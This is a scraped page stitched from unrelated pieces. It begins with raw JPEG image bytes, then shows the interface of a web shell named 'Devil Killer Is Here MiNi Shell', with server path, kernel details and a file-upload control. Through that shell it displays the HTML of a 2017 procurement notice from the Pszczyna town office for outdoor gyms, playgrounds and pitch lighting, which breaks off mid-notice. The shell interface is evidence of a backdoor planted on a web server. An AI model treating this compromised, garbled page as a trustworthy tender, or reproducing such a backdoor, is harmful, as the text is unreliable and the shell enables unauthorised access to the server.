JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170303/36493-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 36493 - 2017
              z dnia 2017-03-03 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Pszczyna: Przedmiotem zamówienia  jest wykonanie dokumentacji projektowej dla inwestycji pn Stworzenie niekomercyjnej infrastruktury turystyczno  rekreacyjnej w sołectwach gminy Pszczyna <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miejski w Pszczynie, krajowy numer identyfikacyjny
              52364300000, ul.
              ul. Rynek 
              2,
              43200  
              Pszczyna, woj.
              śląskie, państwo
              Polska, tel.
              324 493 900, e-mail
              pszczyna@pszczyna.pl, faks
              324 493 955.
              <br />
              Adres strony internetowej (URL): www.pszczyna.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisemna<br />
                Adres:
                <br />Urząd Miejski w Pszczynie, ul. Rynek 2 43-200 Pszczyna</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przedmiotem zamówienia  jest wykonanie dokumentacji projektowej dla inwestycji pn Stworzenie niekomercyjnej infrastruktury turystyczno  rekreacyjnej w sołectwach gminy Pszczyna <br /><b>Numer referencyjny: </b>IZP.271.1.0009.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Szczegółowy opis przedmiotu zamówienia: 
1.Siłownia zewnętrzna w sołectwie Wisła Wielka usytuowana  na działce 1174/27. 
2.Siłownia zewnętrzna w sołectwie Czarków usytuowana  na działce 251/20.
3.Siłownia zewnętrzna w sołectwie  Wisła Mała usytuowana  na działce 1042/103, 1043/103.
4.Siłownia zewnętrzna w sołectwie Piasek usytuowana  na działce 4481/145.
5.Siłownia zewnętrzna w sołectwie Studzienice usytuowana  na działce 1513/46.
6.Siłownia zewnętrzna w sołectwie Poręba usytuowana  na działce 215/12.
7.Siłownia zewnętrzna w sołectwie Brzeźce usytuowana  na działce 638/74.

Zakres prac dla każdej siłowni zewnętrznej z punktów 1-7 obejmuje zaprojektowanie:
a)   Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  orbitrek + biegacz  1 kpl.                     
b) Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  wioślarz + jeździec 1 kpl.               
c)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  prasa nóg + wahadło 1 kpl.           
d)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  stoper + twister  1 kpl.             
e)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  narty + podciąg nóg 1 kpl.             
f)Dostawa i montaż ławka antywandalowa                                                            4 kpl.                                                             
g)Dostawa i montaż kosz na śmieci z daszkiem uchylany                               2 kpl.                                             
h)Dostawa i montaż regulamin                                                                                       1 szt.                                                                                           
i)Wykonanie nawierzchni z kostki betonowej wraz z obrzeżem       

8.Plac zabaw i siłownia zewnętrzna w sołectwie Rudołtowice na działce 205/25. 

Zakres prac obejmuje zaprojektowanie: 
 a)  Dostawa i montaż zestawu zabawowego                                   1 1 kpl. 
 b)Dostawa i montaż huśtawka podwójna, huśtawka ważka, bujak ważka, karuzela ścianka wspinaczkowa, stonoga, zjazd linowy 1 kpl.
c) Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  wahadło + biegacz 1 kpl.                     
d)Dostawa i montaż urządzenia do rekreacji urządzenie siłowni zewnętrznej  wyciąg dolny + górny 1 kpl.                     

9.Wymiana nawierzchni wokół Serca Wsi w sołectwie Łąka na działce 1850/26.

Zakres prac obejmuje zaprojektowanie: 
 -  Wykonanie  nawierzchni z kostki betonowej o powierzchni ok. 200 m wraz                      z obrzeżem. 
- Zabudowa czterech słupów oświetleniowych dla terenu rekreacyjnego na działce nr 1850/6 (zasilanie Serca wsi)
 
10.Wyposażenie boiska szkolnego w elementy ćwiczeniowe oraz elementy placu zabaw  w sołectwie Jankowice na działce 1096/23 i 1719/23. 

Zakres prac obejmuje zaprojektowanie: 
  a) Dostawa i montaż  bramka dla dzieci starszych 2 kpl.
    b) Dostawa i montaż  bramka dla dzieci najmłodszych  2kpl.
    c) Dostawa i montaż  gąsienica sprawnościowa 1 kpl.
    d) Dostawa i montaż  street workout                                      1 kpl.
    e) Bezpieczne podłoże pod poz. a,  b, c, d
    f)  Dostawa i montaż szatni kontenerowej K1                               1 szt. 

11.Siłownia zewnętrzna przy boisku LKS na działce 2223/20 oraz rozbudowa istniejącej siłowni zewnętrznej na działce 2085/112 w sołectwie Studzionka. 

 Zakres prac obejmuje zaprojektowanie 
  Działka 2223/20 :
 a)  Dostawa i montaż urządzenia do rekreacji- urządzenie podwójne siłowni zewnętrznej 3 kpl.(urządzenie podwójne ma składać się z następujących urządzeń dowolnie dopasowanych: motylek rozpiętki, krzesełko do podnoszenia masy ciała  wyciąg górny, krzesełko do podnoszenia masy ciała  wyciskanie,   
trenażer eliptyczny orbitrek, wioślarz, trenażer nóg i rąk)              
 b) Bezpieczne naturalne podłoże pod poz. a,  b, c. 
 Działka 2085/112  
  a) Dostawa i montaż  street workout                                      1 kpl.
  b) Dostawa i montaż  urządzenie podwójne 1 kpl.
  c)  Nawierzchnia  z mat gumowych dla poz. a, b
  d)  Wykonanie nawierzchni z kostki betonowej ok. 70 m wraz z obrzeżem.      

12.Oświetlenie boiska na działce nr 358/43 w Ćwiklicach

Zakres prac obejmuje zaprojektowanie oświetlenia boiska sportowego poprzez zabudowę czterech masztów oświetleniowych oraz szafy sterującej. 
 
Projektant zobowiązany jest do wykonania wstępnej koncepcji projektowej dla poz.  1  12do zatwierdzenia przez Zamawiającego przed opracowaniem ostatecznej dokumentacji projektowej.
INFORMACJA OGÓLNA DLA KAŻDEGO OPRACOWANIA

Podgląd mapy zasadniczej http://wrotapszczynskie.pl/.
Opracowanie powinno obejmować: 
- zakup i aktualizację mapy do celów projektowych, 
- zakup wypisów z rejestru gruntów, które będą przedmiotem opracowania projektowego,
- uzgodnienia branżowe dokonane przez wszystkich gestorów sieci występujących w granicach opracowania, 
- projekt zagospodarowania terenu, 
- kompletny projekt budowlany i wykonawczy wraz z niezbędnymi uzgodnieniami warunkującymi zgłoszenie wykonania robót lub uzyskanie pozwolenia na budowę, 
- dokonania innych uzgodnień i opracowań wynikających z obowiązujących przepisów prawa koniecznych do wykonania przedmiotu umowy, 
- przedłożenia do akceptacji do Wydziału Inwestycji i Zamówień Publicznych Urzędu Miejskiego w Pszczynie opracowanej dokumentacji przed złożeniem projektu w Zespole Uzgadniania Dokumentacji w Pszczynie,
 - przedłożenia pełnej dokumentacji do Wydziału Architektury Starostwa Pszczyńskiego celem uzyskania zgłoszenia lub pozwolenia na budowę,
- projekty wykonawcze branżowe w zakresie przebudowy, zabezpieczenia infrastruktury kolidującej z zamierzoną inwestycją, jeżeli zajdzie konieczność ich wykonania, 
- szczegółowe kosztorysy inwestorskie z zestawieniem kosztów dla poszczególnych branż, 
- przedmiary robót, 
- specyfikacje techniczne wykonania i odbioru robót budowlanych, 

Projektant opracuje dokumentację projektową w sposób, który zapewnia spełnienie poniższych wymagań: 
a)Przedmiary robót muszą przedstawiać opis robót w kolejności technologicznej ich wykonywania i zastosowanych materiałów, z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalania cen (nakładów);
b)Kosztorysy inwestorskie muszą uwzględniać kwotę, jaką Zamawiający przewidział na realizację zadania. Projektant zobowiązany jest zastosować rozwiązania projektowe pozwalające na realizację projektu przy założonym budżecie. W przypadku projektu, dla którego koszt realizacji inwestycji przekracza kwotę przewidzianą przez Zamawiającego, Projektant zobowiązany będzie opracować dokumentację oraz kosztorysy inwestorskie z podziałem na II etapy realizacji;
c)Harmonogram realizacji tj. zestawienie wszystkich prac i odpowiadających im czasookresów realizacji, do jakich będzie musiał się odnieść przyszły Wykonawca opracowując ofertę na realizację inwestycji w oparciu o przedmiotową dokumentację projektową;
d) Wszelkie niezbędne uzgodnienia (w szczególności w zakresie sanitarno-epidemiologicznym, przeciwpożarowym, bhp, itp.) niezbędnych dla uzyskania pozwolenia na budowę lub prawidłowego zawiadomienia o rozpoczęciu robót budowlanych właściwy organ nadzoru budowlanego. 
Wykonawca dostarczy kompletną dokumentację projektową w wersji papierowej                    w 5 egzemplarzach.
Wykonawca poza wersją papierową dostarczy Zamawiającemu kompletną dokumentację w wersji elektronicznej na płytach CD, DVD. Wykonawca dokumentacji projektowej odpowiada za zgodność wersji elektronicznej z przekazaną wersją oryginalną (papierową).
Wykonawca zobowiązuje się do nieodpłatnego wykonania jednokrotnej aktualizacji kosztorysów w okresie 3 lat od daty spisania przez strony protokołu odbioru dokumentacji projektowej, przygotowania wyjaśnień, odpowiedzi do opracowanej dokumentacji i przekazywanie Zamawiającemu w wyznaczonym przez niego terminie, podczas prowadzenia postępowania przetargowego na wyłonienie wykonawcy robót budowlanych. Wykonawca wszystkie opracowania wykona własnym staraniem i na własny koszt. 
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 24/04/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia wymagań w tym zakresie. Warunek zostanie spełniony poprzez złożenie oświadczenia o spełnieniu warunków udziału<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1  Doświadczenie zawodowe:
Zamawiający wymaga, aby Wykonawca wykazał, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej 2 zamówienia o wartości min. 5 000,00 zł brutto każde (słownie: pięć tysięcy złotych 00/100), polegające na wykonaniu projektu budowy, przebudowy lub rozbudowy placu zabaw/siłowni zewnętrznej, a w przypadku składania oferty na realizację dokumentacji projektowej w zakresie realizacji oświetlenia, Zamawiający wymaga, aby Wykonawca wykazał, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej 1 zamówienie o wartości min. 5 000,00 zł brutto (słownie: pięć tysięcy złotych 00/100) polegające na wykonaniu projektu budowy sieci kablowej niskiego napięcia, dla których uzyskano zgłoszenie /pozwolenie na budowę.
2.  Kadra techniczna:
Zamawiający wymaga, aby Wykonawca wykazał dysponowanie minimum jedną osobą posiadającą uprawnienia budowlane w zakresie projektowania w specjalności architektonicznej lub konstrukcyjno-budowlanej lub w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych (w przypadku składnia oferty na wykonanie projektu oświetlenia) lub odpowiadające im uprawnienia równoważne, które zostały wydane na podstawie wcześniej obowiązujących przepisów w rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278) zrzeszonych we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów ( Dz. U. z 2013 r. poz. 932 ) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2016 r. poz. 290 ze zm.) lub spełniającej warunki, o których mowa w ustawie z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 poz. 65). 
3. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu 
w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków prawnych.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy;

2. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

3. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. wykaz projektów  wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których te usługi zostały wykonane, z załączeniem dowodów określających, czy te usługi zostały wykonane należycie  potwierdzających spełnianie warunku opisanego w rozdziale IV pkt 3.2.1.
2.wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego,  wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji 
o podstawie do dysponowania tymi osobami - potwierdzających spełnienie warunku opisanego w rozdziale IV pkt 3.2.2.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
